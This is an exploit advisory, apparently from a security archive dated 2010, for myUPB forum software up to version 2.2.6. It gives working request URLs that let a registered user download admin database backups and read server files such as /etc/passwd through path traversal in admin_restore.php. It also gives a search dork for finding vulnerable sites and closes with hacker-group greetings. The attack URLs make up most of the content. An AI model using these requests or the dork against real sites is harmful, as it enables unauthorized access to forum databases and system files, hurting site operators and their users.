myUPB <= v2.2.6 Multiple Vulnerabilities

2010-06-24 / 2010-06-25
Credit: altbta
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

=============== altbta ====================== #Name: myUPB <= v2.2.6 Multiple Vulnerabilities #Download: http://sourceforge.net/projects/textmb/files/UPB/ #Vulnerability: CSRF privilege escalation #Tested on: 2.2.6 #Author : altbta (l_9@hotmail.com) #Dork: "Powered by myUPB" ================= backup exploit: ============== backup exploit: register.php http://localhost/upb/register.php go too http://localhost/upb/admin_restore.php?action=download Download: upbdatabackup_v2.2.6_06.21.2010.1277118622.zip upbdatabackup_v2.2.6_06.21.2010.1277118651.zip upbdatabackup_v2.2.6_06.21.2010.1277118703.zip upbdatabackup_v2.2.6_06.21.2010.1277118704.zip http://localhost/upb/admin_restore.php?action=download&file=upbdatabackup_v2.2.6_06.21.2010.1277118704.zip ================= LFI exploit: ============== LFI exploit: register.php http://localhost/upb/register.php go too http://localhost/upb/admin_restore.php?action=download&file=../../../index.php http://localhost/upb/admin_restore.php?action=download&file=../../../../../../../etc/passwd ##################################################################### RoMaNcYxHaCkEr & sad hacker & ab0-3th4b & Mr.SaFa7 & Mn7oS & V ! V 3 Evil-Cod3r & asL-Sabia & ! Dr.www ! & MaKKaWi & ZaIdOoHxHaCkEr & al.bito SnIpEr.SiTeS & R3d-D3v!L xp10.me/xp10 & v4-team.com/cc


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top